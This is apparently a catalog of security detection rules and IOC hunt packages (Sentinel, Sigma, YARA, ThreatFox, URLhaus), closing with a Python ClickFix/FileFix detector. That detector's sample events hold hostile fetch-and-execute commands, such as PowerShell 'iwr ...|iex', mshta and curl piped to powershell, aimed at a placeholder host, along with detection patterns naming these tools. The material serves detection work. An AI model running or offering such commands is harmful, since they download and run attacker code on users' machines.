AuditLogsOfficeActivitySecurityEventSyslogWindowsEvent

'This query will determine multiple password resets by user across multiple data sources. Account manipulation including password reset may aid adversaries in maintaining access to credentials and cer

credential-theftmicrosoftofficial
Azure-Sentinel source
T1098T1078
OfficeActivity

'Oftentimes, after the initial compromise, the attackers create inbox rules to delete emails that contain certain keywords. This is done to limit the ability to warn compromised users that they've b

microsoftofficialphishing
Azure-Sentinel source
T1114T1020
OfficeActivity

'Identifies when multiple (more than one) users' mailboxes are configured to forward to the same destination. This could be an attacker-controlled destination mailbox configured to collect mail from mu

microsoftofficial
Azure-Sentinel source
T1190
Heartbeat

Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vu

exploitmicrosoftofficial
Azure-Sentinel source
T1203
DeviceFileEvents

'This query looks for writes of PE files to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware, as well as some legitimate programs, and writes of PE files to the f

exploitmicrosoftofficial
Azure-Sentinel source
T1566
CommonSecurityLogSecurityAlert

'The purpose of this content is to identify successful phishing links accessed by users. Once a user clicks on a phishing link, we observe successful network activity originating from non-Microsoft ne

microsoftofficialphishing
Azure-Sentinel source
T1568
CommonSecurityLog

'Identifies contacts with domains names in CommonSecurityLog that might have been generated by a Domain Generation Algorithm (DGA). DGAs can be used by malware to generate rendezvous points that are d

backdoormicrosoftofficial
Azure-Sentinel source
T1568

'This rule identifies communication with hosts that have a domain name that might have been generated by a Domain Generation Algorithm (DGA). DGAs are used by malware to generate rendezvous points tha

backdoormicrosoftofficial
Azure-Sentinel source
T1548.002
imRegistry

'This detection looks for the steps required to conduct a UAC bypass using Fodhelper.exe. By default this detection looks for the setting of the required registry keys and the invoking of the process

evasionmicrosoftofficial
Azure-Sentinel source
T1203
CommonSecurityLogDeviceEventsDeviceFileEventsDeviceImageLoadEventsSecurityAlertimFileEvent

'This query looks for file hashes and AV signatures associated with Prestige ransomware payload.'

microsoftofficialransomware
Azure-Sentinel source
T1190

'This query identifies exploitation attempts using the Pulse Connect Secure (PCS) vulnerability (CVE-2021-22893) against the VPN server'

exploitmicrosoftofficial
Azure-Sentinel source
T1071
CommonSecurityLogSigninLogs

'This content is utilized to identify instances of successful login by risky users, who have been observed engaging in potentially suspicious network activity on non-Microsoft network devices.'

microsoftofficial
Azure-Sentinel source
T1041T1071.001
CommonSecurityLog

'This detection will alert when RunningRAT URI parameters or paths are detected in an HTTP request. If the device blocked this communication, the presence of this alert means the RunningRAT implant is likely

backdoormicrosoftofficial
Azure-Sentinel source
T1562
DeviceProcessEventsSecurityEventWindowsEvent

'Identifies attempts to modify registry ACL to evade security solutions. In the Solorigate attack, the attackers were found modifying registry permissions so services.exe cannot access the relevant re

microsoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects a Service Principal being assigned an app role that has sensitive access such as Mail.Read. A threat actor who compromises a Service Principal may assign it an app role to allow it to acces

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects a privileged role being added to a Service Principal. Ensure that any assignment to a Service Principal is valid and appropriate - Service Principals should not be assigned to very highly p

backdoormicrosoftofficial
Azure-Sentinel source
T1566
AzureDiagnosticsCommonSecurityLogDeviceNetworkEventsEmailEventsEmailUrlInfoVMConnection

'Identifies a match across various data feeds for domains related to an actor tracked by Microsoft as Star Blizzard.'

microsoftofficial
Azure-Sentinel source
DeviceProcessEvents

Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'This query will detect when an attempt is made to update an existing user and link it to a guest or external identity. These activities are unusual, and such linking of external identities should b

microsoftofficial
Azure-Sentinel source
T1078.004
AuditLogsSigninLogs

'This query will detect logins from a guest account which was recently deleted. Any successful logins from deleted identities should be investigated further if any existing user accounts have been

microsoftofficial
Azure-Sentinel source
T1078.004
AuditLogsIdentityInfo

'This query will detect if user properties of Global Administrator are updated by an existing user. Usually only user administrator or other global administrator can update such properties. Investigat

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
BehaviorAnalytics

'This query looks for sign ins by the Microsoft Entra ID Connect Sync account to Azure where properties about the logon are anomalous. This query uses Microsoft Sentinel's UEBA features to detect thes

credential-theftmicrosoftofficial
Azure-Sentinel source
T1078T1106T1526
AuditLogsIdentityInfoSecurityAlert

'This detection identifies high-severity alerts across various Microsoft security products, including Microsoft Defender XDR and Microsoft Entra ID, and correlates them with instances of Google Cloud

microsoftofficial
Azure-Sentinel source
T1030
CommonSecurityLog

'Identifies anomalous spikes in network traffic logs as compared to baseline or normal historical patterns. The query leverages a KQL built-in anomaly detection algorithm to find large deviations from

backdoormicrosoftofficial
Azure-Sentinel source
T1030
CommonSecurityLogVMConnection

'Identifies anomalous data transfer to public networks. The query leverages built-in KQL anomaly detection algorithms that detect large deviations from a baseline pattern. A sudden increase in data t

backdoormicrosoftofficial
Trust Monitor Event
kql medium
Azure-Sentinel source
T1528T1555

'This query identifies when a new trust monitor event is detected.'

microsoftofficial
Unusual Anomaly
kql medium
Azure-Sentinel source

'Anomaly Rules generate events in the Anomalies table. This scheduled rule tries to detect Anomalies that are not usual, they could be a type of Anomaly that has recently been activated, or an infrequ

backdoormicrosoftofficial
Azure-Sentinel source
T1136
DeviceProcessEventsSecurityEvent

'The query below identifies the creation of an unusual identity by the Europium actor to mimic the Microsoft Exchange Health Manager Service account using Exchange PowerShell commands. Reference: https://www.m

microsoftofficialpowershell
Azure-Sentinel source
T1078.004
AuditLogsSigninLogs

'Detects a URL being added to an application where the domain is not one that is associated with the tenant. The query uses domains seen in sign in logs to determine if the domain is associated with

backdoormicrosoftofficial
Azure-Sentinel source
T1136.003
AuditLogs

'This query looks for accounts being created where the name does not match a defined pattern. Attackers may attempt to add accounts as a means of establishing persistent access to an environment, lo

backdoormicrosoftofficial
Azure-Sentinel source
T1136.003
AuditLogs

'This query looks for accounts being created that do not have attributes populated that are commonly populated in the tenant. Attackers may attempt to add accounts as a means of establishing persist

backdoormicrosoftofficial
Azure-Sentinel source
T1098
AuditLogs

'Detects when a guest account in a tenant is converted to a member of the tenant. Monitoring guest accounts and the access they are provided is important to detect potential account abuse. Account

backdoormicrosoftofficial
Azure-Sentinel source
T1530T1213T1020

This query monitors for users running Log Analytics queries that contain filters for specific, defined VIP user accounts or the VIPUser watchlist template. Use this detection to alert for users specif

microsoftofficial
Azure-Sentinel source
T1110
CommonSecurityLog

'Identifies instances where Wazuh logged over 400 '403' Web Errors from one IP Address. To onboard Wazuh data into Sentinel please view: https://documentation.wazuh.com/current/cloud-security/azure/in

microsoftofficial
Azure-Sentinel source
T1041T1071.001
CommonSecurityLogDeviceEvents

'This detection will identify network requests in HTTP proxy data that contain Base64 encoded usernames from machines in the DeviceEvents table. This technique was seen used by POLONIUM in their Runn

backdoormicrosoftofficial
SigmaHQ source
T1027.004
imProcessCreate

Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.

SigmaHQ source
T1036.005T1055T1055.012
imProcessCreate

Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns. This could point at a file masquerading as svchost, a proc

SigmaHQ source
T1036.002
imProcessCreate

Detects the presence of the "U+202E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This character is used as an obfuscation and masquerad

backdoorevasion
Azure-Sentinel source
T1059T1027T1140
imProcessCreate

'Identifies instances of a base64 encoded PE file header seen in the process command line parameter. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://ak

microsoftofficial
Azure-Sentinel source
T1110
imAuthentication

'Identifies evidence of brute force activity against a user based on multiple authentication failures and at least one successful authentication within a given time window. Note that the query does no

credential-theftmicrosoftofficial
Yara-Rules source

YARA rule: DebuggerCheck__DrWatson

community
Yara-Rules source

YARA rule: DebuggerCheck__GlobalFlags

community
Yara-Rules source

YARA rule: DebuggerCheck__PEB

community
Yara-Rules source

YARA rule: DebuggerCheck__QueryInfo

community
Yara-Rules source

YARA rule: DebuggerCheck__RemoteAPI

community
Yara-Rules source

YARA rule: DebuggerException__ConsoleCtrl

community
Yara-Rules source

YARA rule: DebuggerException__SetConsoleCtrl

community
Yara-Rules source

YARA rule: DebuggerException__UnhandledFilter

community
Yara-Rules source

YARA rule: DebuggerHiding__Active

community
Yara-Rules source

YARA rule: DebuggerHiding__Thread

community
Yara-Rules source

YARA rule: DebuggerOutput__String

community
Yara-Rules source

YARA rule: DebuggerPattern__RDTSC

community
Yara-Rules source

YARA rule: DebuggerTiming__PerformanceCounter

community
Yara-Rules source

YARA rule: DebuggerTiming__Ticks

community
Azure-Sentinel source
T1569T1003
SecurityAlertimProcessCreate

'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th

lateral-movementmicrosoftofficial
Azure-Sentinel source
T1071.001

'Identifies callouts to Discord CDN addresses for risky file extensions. This detection will trigger when a callout for a risky file is made to a discord server that has only been seen once in your en

microsoftofficial
Azure-Sentinel source
T1496

'Identifies IP addresses that may be performing DNS lookups associated with common currency mining pools. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom s

microsoftofficial
Azure-Sentinel source
T1048

'Identifies IP addresses performing DNS lookups associated with common ToR proxies. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom source that supports th

microsoftofficial
Azure-Sentinel source
T1110T1556

This rule identifies a source that repeatedly fails to authenticate to a web service (HTTP response code 403). This may indicate a [brute force](https://en.wikipedia.org/wiki/Brute-force_attack) or [c

credential-theftmicrosoftofficial
Azure-Sentinel source
T1568T1008

'This creates an incident in the event a client generates excessive amounts of DNS queries for non-existent domains. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in

backdoormicrosoftofficial
Azure-Sentinel source
T1564
imProcessCreate

'Identifies malware that has been hidden in the recycle bin. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimProcessEvent)'

microsoftofficial
Azure-Sentinel source
T1547
imProcessCreate

'This query identifies when rundll32.exe executes a specific set of inline VBScript commands. References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-m

microsoftofficial
Azure-Sentinel source
T1072T1570

'This detection highlights executables deployed to hosts via either the Default Domain or Default Domain Controller Policies. These policies apply to all hosts or Domain Controllers and best practice

microsoftofficial
Azure-Sentinel source
T1568T1008
DnsEvents

'Identifies clients with a high NXDomain count which could be indicative of a DGA (cycling through possible C2 domains where most C2s are not live). Alert is generated when a new IP address is seen (b

backdoormicrosoftofficial
Azure-Sentinel source
T1110
imAuthentication

'This query searches for failed attempts to log in from more than 15 different users within a 5 minute timeframe from the same source. This is a potential indication of a password spray attack. To use t

microsoftofficial
Azure-Sentinel source
T1485T1036

'This detection looks for command line parameters associated with the use of Sysinternals sdelete (https://docs.microsoft.com/sysinternals/downloads/sdelete) to delete multiple files on a host's C dri

microsoftofficial
Azure-Sentinel source
T1018
imProcessCreate

'Identifies the host and account that executed AdFind by hash and filename in addition to common and unique flags that are used by many threat actors in discovery. To use this analytics rule, make sur

microsoftofficial
Azure-Sentinel source
T1485

'This query looks for the Sdelete process being run recursively after being deployed to a host via GPO. Attackers could use this technique to deploy Sdelete to multiple hosts and delete data on them.

microsoftofficial
SEH v3
yara low
Yara-Rules source

YARA rule: SEH__v3

community
SEH v4
yara low
Yara-Rules source

YARA rule: SEH__v4

community
SEH vba
yara low
Yara-Rules source

YARA rule: SEH__vba

community
SEH vectored
yara low
Yara-Rules source

YARA rule: SEH__vectored

community
Azure-Sentinel source
T1078T1098
imAuthentication

'Identifies IPs that, after failed attempts to sign in to one or more disabled accounts, signed in successfully to another account. To use this analytics rule, make sure you have deployed the [ASIM normalizat

microsoftofficial
Azure-Sentinel source
T1195T1059T1546
imFileEvent

Identifies SolarWinds SUNBURST and SUPERNOVA backdoor file hash IOCs in File Events. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimFileEven

backdoormicrosoftofficial
Azure-Sentinel source
T1059T1543
imProcessCreate

Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv

backdoormicrosoftofficial
Yara-Rules source

YARA rule: ThreadControl__Context

community
ThreatFox source
DnsEvents

Hunt package for 108 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 31 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 14 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Meterpreter

iocthreatfoxwin-meterpreter
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 9 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
DeviceFileEventsUrlClickEvents

Hunt package for 4 IOCs associated with SocksProxyGo

iocthreatfoxwin-socksproxygo
ThreatFox: XWorm IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 5 IOCs associated with XWorm

iocthreatfoxwin-xworm
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 46 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 32 malicious URLs tagged as ACRStealer

infostealeriocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1078
imAuthentication

'This query searches for successful user logins from different countries within 3 hours. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimAu

microsoftofficial
WindowsPE
yara low
Yara-Rules source

YARA rule: WindowsPE

community
SigmaHQ source
T1027T1059.001
imProcessCreate

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block

backdoorevasionpowershell
SigmaHQ source
T1027T1059.001
imProcessCreate

Detects Obfuscated Powershell via Stdin in Scripts

evasionpowershell
SigmaHQ source
T1027T1059.001
imProcessCreate

Detects Obfuscated Powershell via use Clip.exe in Scripts

evasionpowershell
SigmaHQ source
imProcessCreate

Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in a URL combined with a download command

Obfuscated IP Via CLI
sigma medium
SigmaHQ source
imProcessCreate

Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line

SigmaHQ source
T1027.009
imProcessCreate

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

evasionpowershell
SigmaHQ source
T1059.006T1027.010
imProcessCreate

Detects the use of Python's base64 decoding functions in command line executions on Linux systems. Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is

evasion
SigmaHQ source
T1087.001T1087.002T1482T1069.001T1069.002T1059.001
imFileEvent

Detects default file names output by the BloodHound collection tool SharpHound

SigmaHQ source
T1059.003T1021.004T1219
imProcessCreate

Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities. This may indicate remote command execution through OpenEDR's remote mana

backdoorlateral-movementpowershell
SigmaHQ source
T1105T1570T1219
imFileEvent

Detects the creation of potentially suspicious files by OpenEDR's ITSMService process. The ITSMService is responsible for remote management operations and can create files on the system through the Pr

backdoor
SigmaHQ source
T1059.005T1059.007
imProcessCreate

Detects wscript/cscript/mshta executions of scripts located in user directories

SigmaHQ source
T1059.001
imProcessCreate

Detects potentially suspicious powershell script executions from a temporary folder

powershell
SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.

SigmaHQ source
T1036
imProcessCreate

Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.

SigmaHQ source
T1036.005
imFileEvent

Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using

SigmaHQ source
T1195.002T1557
imProcessCreate

Detects suspicious child process creation by the Notepad++ updater process (gup.exe). This could indicate potential exploitation of the updater component to deliver unwanted malware.

exploit
SigmaHQ source
T1195.002T1557
imFileEvent

Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations. This could indicate potential exploitation of the updater component to deliver unwanted malware or unwar

exploit
SigmaHQ source
T1562.001
imRegistry

Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers, and its modification may indicate an attempt to

evasion
SigmaHQ source
T1083
imProcessCreate

Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.

SigmaHQ source
T1574.001
imFileEvent

Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. Phantom DLL hijacking invol

backdoor
SigmaHQ source
T1548T1554
imProcessCreate

Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non-privileged process to make arbitrary manipulations of group IDs (GIDs

backdoor
SigmaHQ source
T1548T1554
imProcessCreate

Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non-privileged process to make arbitrary manipulations of user IDs (UIDs)

backdoor
SigmaHQ source
T1112T1574.001
imRegistry

Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings. Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious

SigmaHQ source
T1548.002T1546.001
imRegistry

Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence. Generally, modifications to the `*\shell\open\command` registry key can

evasionpersistence
SigmaHQ source
T1003.001
imProcessCreate

Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's (Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.

credential-theftevasion
SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry. Adversaries may modify these keys to execute malicious code when Office files are opened. There are various legitimate add-ins

persistence
SigmaHQ source
T1137
imRegistry

Detects changes to the registry values related to outlook security settings

SigmaHQ source
T1137.006
imRegistry

Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.

persistence
SigmaHQ source
T1003T1562.001
DeviceImageLoadEvents

Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories. These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes o

credential-theft
SigmaHQ source
T1218.007
imProcessCreate

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installatio

SigmaHQ source
T1547.001
imRegistry

Detects modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts. Attackers may modify User Shell Folders registry keys to point to

persistence
SigmaHQ source
T1553.004
imProcessCreate

Detects installation of suspicious packages using system installation utilities

SigmaHQ source
T1685.001
imRegistry

Detects tampering with AutoLogger trace sessions, a technique used by attackers to disable logging. The AutoLogger event tracing session records events that occur early in the operating sys

aptbackdoor
SigmaHQ source
T1562.001
imRegistry

Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can

credential-theftlateral-movement
SigmaHQ source
T1562.001
imRegistry

Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can acc

credential-theftlateral-movement
SigmaHQ source
T1562.001T1562.006
imRegistry

Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value. Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications

backdoor
SigmaHQ source
T1218, T1105
imFileEvent

Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution. Adversaries may leverage legitimate applica

SigmaHQ source
T1482, T1087, T1087.001, T1087.002, T1069.001, T1069.002, T1069, T1059.001
imProcessCreate

Detects cmdlet names from well-known PowerShell exploitation frameworks

exploit, powershell
SigmaHQ source
T1059.001
imFileEvent

Detects the creation of known offensive PowerShell scripts used for exploitation

SigmaHQ source
T1105
imNetworkSession

Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.

SigmaHQ source
T1105
imNetworkSession

Detects a network connection initiated by programs or processes running from suspicious or uncommon file system locations.

SigmaHQ source
T1056.002
DeviceImageLoadEvents

Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".

SigmaHQ source
T1547.009
imFileEvent

Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.

SigmaHQ source
T1486, T1562.001
DeviceImageLoadEvents

Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (

SigmaHQ source
T1547.001
imRegistry

Detects modification of autostart extensibility point (ASEP) in registry.

persistence
SigmaHQ source
T1574.001
imFileEvent

Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).

SigmaHQ source
T1490
DeviceImageLoadEvents

Detects the image load of VSS DLL by uncommon executables

SigmaHQ source
imFileEvent

Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes, which could be abused by an attacker to block EDR/AV components while allowing their own malicio

SigmaHQ source
T1547.001
imFileEvent

A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.

SigmaHQ source
T1685
imProcessCreate

Detects execution of EDR-Freeze, a tool that exploits the MiniDumpWriteDump function and WerFaultSecure.exe to suspend EDR and Antivirus processes on Windows. EDR-Freeze leverages a race-condition att

exploit
SigmaHQ source
T1204.004, T1027.010
imProcessCreate

Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. Cl

phishing
SigmaHQ source
T1552, T1005, T1059.004
imProcessCreate

Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,

credential-theft
SigmaHQ source
T1552, T1005, T1059.007
imProcessCreate

Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,

credential-theft
SigmaHQ source
T1059, T1203
imProcessCreate

Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe. ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromise

SigmaHQ source
T1127, T1105, T1133
imFileEvent

Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS server, creates a file with suspicious file type, indicating that it may be an executable,

SigmaHQ source
T1082
imProcessCreate

Detects listing of the inodes of the "/" directory to determine whether we are running inside a container.

SigmaHQ source
T1204.004
imProcessCreate

Detects suspicious FileFix execution patterns where users are tricked into running malicious commands through browser file upload dialog manipulation. This attack typically begins when users visit mal

apt
SigmaHQ source
T1112
imRegistry

Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'.

backdoor
SigmaHQ source
T1059.004, T1027
imFileEvent

Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigg

SigmaHQ source
T1204.004
imRegistry

Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.

SigmaHQ source
T1071.004, T1059.003
imNetworkSession

Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged t

SigmaHQ source
T1204.001
imRegistry

Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. ClickFix is known to be distributed through phishing campaigns an

apt, phishing
SigmaHQ source
T1204.001, T1204.004
imProcessCreate

Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar

apt, powershell
SigmaHQ source
T1059.003, T1027.010
imProcessCreate

Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing. This pattern may indicate an attempt to discover and execute system binar

powershell
SigmaHQ source
T1546.015
imRegistry

Detects potential COM object hijacking via modification of default system CLSID.

SigmaHQ source
T1204.004, T1027.010
imRegistry

Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run di

phishing
SigmaHQ source
T1204.004, T1027.010
imRegistry

Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.

phishing
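
The ClickFix/FileFix entries in this list (whitespace padding followed by '#' in a command line, HTTP links and long space runs in the Run dialog's RunMRU history, chained commands and space runs in Explorer's TypedPaths history) all come down to string checks over process-creation and registry-set events. The Python below is an added example written for this page, not the SigmaHQ rule logic: it runs those checks over a few constructed sample events. The padding threshold, the chained-command token list and the lure hostname are assumptions made here; Windows does store RunMRU entries with a trailing "\1", which the code strips before matching.

```python
import re

# Thresholds and token lists below are assumptions for this example,
# not the values the SigmaHQ rules use.
MIN_PAD = 10
PAD_THEN_HASH = re.compile(r"\s{%d,}#" % MIN_PAD)   # "<command> <many spaces># I am not a robot"
LONG_PAD = re.compile(r" {%d,}" % MIN_PAD)           # numerous spaces inside a typed value
URL = re.compile(r"https?://", re.IGNORECASE)
CHAINED = re.compile(r"(&&|\|\||\||;)|\b(cmd(\.exe)? /c|powershell|mshta|curl)\b", re.IGNORECASE)


def check_process(cmdline):
    """Process-creation check: padding that pushes a '#' comment out of the visible area."""
    return ["clickfix_padding_then_hash"] if PAD_THEN_HASH.search(cmdline) else []


def check_registry(key, value):
    """Registry check for the Run dialog (RunMRU) and Explorer address bar (TypedPaths) history."""
    hits = []
    leaf = key.rsplit("\\", 1)[-1]
    if leaf == "RunMRU":
        if value.endswith("\\1"):        # Windows stores RunMRU entries as "<command>\1"
            value = value[:-2]
        if URL.search(value):
            hits.append("runmru_contains_url")
        if LONG_PAD.search(value):
            hits.append("runmru_space_padding")
    elif leaf == "TypedPaths":
        if CHAINED.search(value):
            hits.append("typedpaths_chained_command")
        if LONG_PAD.search(value):
            hits.append("typedpaths_space_padding")
    return hits


def evaluate(events):
    """Run both checks over a list of event dicts; returns (event index, rule name) pairs."""
    findings = []
    for i, ev in enumerate(events):
        if ev["kind"] == "process":
            hits = check_process(ev["cmdline"])
        else:
            hits = check_registry(ev["key"], ev["value"])
        findings.extend((i, h) for h in hits)
    return findings


# Constructed sample events (not real telemetry); lure.example is a placeholder host.
RUNMRU = r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
TYPEDPATHS = r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths"
SAMPLE_EVENTS = [
    {"kind": "process", "cmdline": 'powershell -w hidden -c "iwr http://lure.example/x|iex"'
                                   + " " * 200 + "# I am not a robot: verification ID 7731"},
    {"kind": "registry", "key": RUNMRU, "name": "a", "value": "mshta https://lure.example/verify.hta\\1"},
    {"kind": "registry", "key": TYPEDPATHS, "name": "url1",
     "value": "cmd /c curl -s http://lure.example/f.ps1|powershell -" + " " * 120 + "# verification"},
    {"kind": "registry", "key": RUNMRU, "name": "b", "value": "notepad\\1"},
    {"kind": "process", "cmdline": "cmd /c dir"},
    {"kind": "registry", "key": TYPEDPATHS, "name": "url2", "value": r"C:\Users\alice\Documents"},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(idx, rule)
```

Only the first three sample events should fire; the benign RunMRU entry, the plain cmd invocation and the ordinary folder path in TypedPaths pass through untouched.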
SigmaHQ source
T1136.001
imRegistry

